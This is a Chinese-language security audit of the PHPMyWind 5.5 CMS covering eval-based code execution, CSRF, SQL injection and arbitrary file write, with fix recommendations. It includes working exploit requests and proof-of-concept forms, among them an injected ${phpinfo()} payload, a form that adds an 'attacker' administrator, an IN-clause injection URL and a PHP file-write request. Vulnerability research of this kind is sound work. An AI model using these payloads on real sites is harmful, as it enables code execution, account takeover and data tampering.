PHPMyWind 5.5 代码审计报告与漏洞分析<\/h1>

1. 有限制的代码执行漏洞<\/h2>

漏洞位置<\/h3>
common.func.php<\/code> 第554-559行：<\/p>
function<\/span> String2Array<\/span>($data) {
<\/span><\/span>    if<\/span>($data ==<\/span> ''<\/span>) return<\/span> array<\/span>();
<\/span><\/span>    @<\/span>eval<\/span>("<\/span>\$<\/span>array = <\/span>$data<\/span>;"<\/span>);
<\/span><\/span>    return<\/span> $array;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞分析<\/h3>

该函数直接使用eval()<\/code>执行传入的$data<\/code>参数，存在代码执行风险<\/li>
全局搜索发现有两处调用此函数的地方<\/li>
<\/ul>
触发点分析<\/h3>
goods_save.php<\/code> 第103-117行：<\/p>
if<\/span>(is_array<\/span>($attrid) &&<\/span> is_array<\/span>($attrvalue)) {
<\/span><\/span>    $attrstr .=<\/span> 'array('<\/span>;
<\/span><\/span>    $attrids =<\/span> count<\/span>($attrid);
<\/span><\/span>    for<\/span>($i=<\/span>0<\/span>; $i<<\/span>$attrids; $i++<\/span>) {
<\/span><\/span>        $attrstr .=<\/span> '"'<\/span>.<\/span>$attrid[$i].<\/span>'"=>'<\/span>.<\/span>'"'<\/span>.<\/span>$attrvalue[$i].<\/span>'"'<\/span>;
<\/span><\/span>        if<\/span>($i <<\/span> $attrids-<\/span>1<\/span>) {
<\/span><\/span>            $attrstr .=<\/span> ','<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    $attrstr .=<\/span> ');'<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方式<\/h3>

$attrid<\/code>和$attrvalue<\/code>参数未经过滤<\/li>
构造恶意请求：<\/li>
<\/ul>
classid=12&typeid=10&brandid=-1&title=test&colorval=&boldval=&attrvalue[]=1&attrid[]=1|${phpinfo()}&attrvalue[]=1&attrid[]=2...
<\/code><\/pre>
2. CSRF漏洞<\/h2>
漏洞描述<\/h3>

后台多处操作未进行CSRF防护<\/li>
可构造恶意表单诱导管理员点击<\/li>
<\/ul>
利用方式<\/h3>

代码执行CSRF POC：<\/li>
<\/ol>
<form<\/span> action<\/span>=<\/span>"http:\/\/www.test.com\/phpmywind_5.5\/admin\/goods_save.php"<\/span> method<\/span>=<\/span>"POST"<\/span>>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"attrid[]"<\/span> value<\/span>=<\/span>"1|{${phpinfo()}}"<\/span> \/>
<\/span><\/span>    <!-- 其他必要参数 --><\/span>
<\/span><\/span><\/form<\/span>>
<\/span><\/span><\/code><\/pre>
添加管理员CSRF POC：<\/li>
<\/ol>
<form<\/span> action<\/span>=<\/span>"http:\/\/www.test.com\/phpmywind_5.5\/admin\/admin_save.php"<\/span> method<\/span>=<\/span>"POST"<\/span>>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"username"<\/span> value<\/span>=<\/span>"attacker"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"password"<\/span> value<\/span>=<\/span>"attacker"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"repassword"<\/span> value<\/span>=<\/span>"attacker"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"levelname"<\/span> value<\/span>=<\/span>"1"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"action"<\/span> value<\/span>=<\/span>"add"<\/span> \/>
<\/span><\/span><\/form<\/span>>
<\/span><\/span><\/code><\/pre>3. 后台SQL注入漏洞<\/h2>
漏洞位置<\/h3>
多处IN<\/code>语句参数未过滤，如：<\/p>
case<\/span> 'delall'<\/span>:<\/span>
<\/span><\/span>    $sql =<\/span> "DELETE FROM `<\/span>$tbname<\/span>` WHERE id IN (<\/span>$ids<\/span>)"<\/span>;
<\/span><\/span>    $dosql-><\/span>ExecNoneQuery<\/span>($sql);
<\/span><\/span>    break<\/span>;
<\/span><\/span><\/code><\/pre>利用方式<\/h3>
构造恶意请求：<\/p>
admin\/ajax_do.php?action=delall&ids=1) and (select 1)=(1&type=goodsattr
<\/code><\/pre>
4. 后台任意文件写入漏洞<\/h2>
漏洞函数<\/h3>
Writef()<\/code>函数：<\/p>
function<\/span> Writef<\/span>($file,$str,$mode=<\/span>'w'<\/span>) {
<\/span><\/span>    if<\/span>(file_exists<\/span>($file) &&<\/span> is_writable<\/span>($file)) {
<\/span><\/span>        $fp =<\/span> fopen<\/span>($file, $mode);
<\/span><\/span>        flock<\/span>($fp, 3<\/span>);
<\/span><\/span>        fwrite<\/span>($fp, $str);
<\/span><\/span>        fclose<\/span>($fp);
<\/span><\/span>        return<\/span> TRUE<\/span>;
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用点1：ajax_do.php<\/code><\/h3>
if<\/span>($action ==<\/span> 'updataauth'<\/span>) {
<\/span><\/span>    $fdir =<\/span> PHPMYWIND_DATA<\/span>.<\/span>'\/cache\/auth\/'<\/span>;
<\/span><\/span>    $fname =<\/span> 'auth_'<\/span>.<\/span>$cfg_auth_key.<\/span>'.php'<\/span>;
<\/span><\/span>    Writef<\/span>($fdir.<\/span>$fname, $jsonStr);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方式：<\/p>
admin\/ajax_do.php?action=updataauth&jsonStr=<?php phpinfo();?>
<\/code><\/pre>
利用点2：database_done.php<\/code><\/h3>
if<\/span>($conftb ==<\/span> 1<\/span>) {
<\/span><\/span>    $config_cache =<\/span> PHPMYWIND_INC<\/span>.<\/span>'\/config.cache.php'<\/span>;
<\/span><\/span>    $str =<\/span> '<?php if(!defined(\'IN_PHPMYWIND\')) exit(\'Request Error!\');'<\/span>.<\/span>"<\/span>\r\n\r\n<\/span>"<\/span>;
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    Writef<\/span>($config_cache,$str);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用条件：<\/p>

当vartype<\/code>为number<\/code>时，变量值不会被单引号包裹<\/li>
通过添加配置项实现代码注入<\/li>
<\/ul>
5. 漏洞修复建议<\/h2>


代码执行漏洞<\/strong>：<\/p>

过滤String2Array<\/code>函数输入<\/li>
使用json_decode<\/code>替代eval<\/code><\/li>
<\/ul>
<\/li>

CSRF漏洞<\/strong>：<\/p>

添加CSRF Token验证<\/li>
关键操作使用POST请求<\/li>
<\/ul>
<\/li>

SQL注入漏洞<\/strong>：<\/p>

对IN<\/code>语句参数进行过滤<\/li>
使用预处理语句<\/li>
<\/ul>
<\/li>

文件写入漏洞<\/strong>：<\/p>

限制可写入目录<\/li>
检查写入内容是否合法<\/li>
对number<\/code>类型配置项进行严格验证<\/li>
<\/ul>
<\/li>
<\/ol>
6. 审计经验总结<\/h2>

关注eval<\/code>、assert<\/code>等危险函数的使用<\/li>
检查所有用户输入是否经过适当过滤<\/li>
注意后台功能的CSRF防护情况<\/li>
文件操作函数需要严格限制路径和内容<\/li>
即使看似无害的功能(如配置管理)也可能存在安全隐患<\/li>
<\/ol>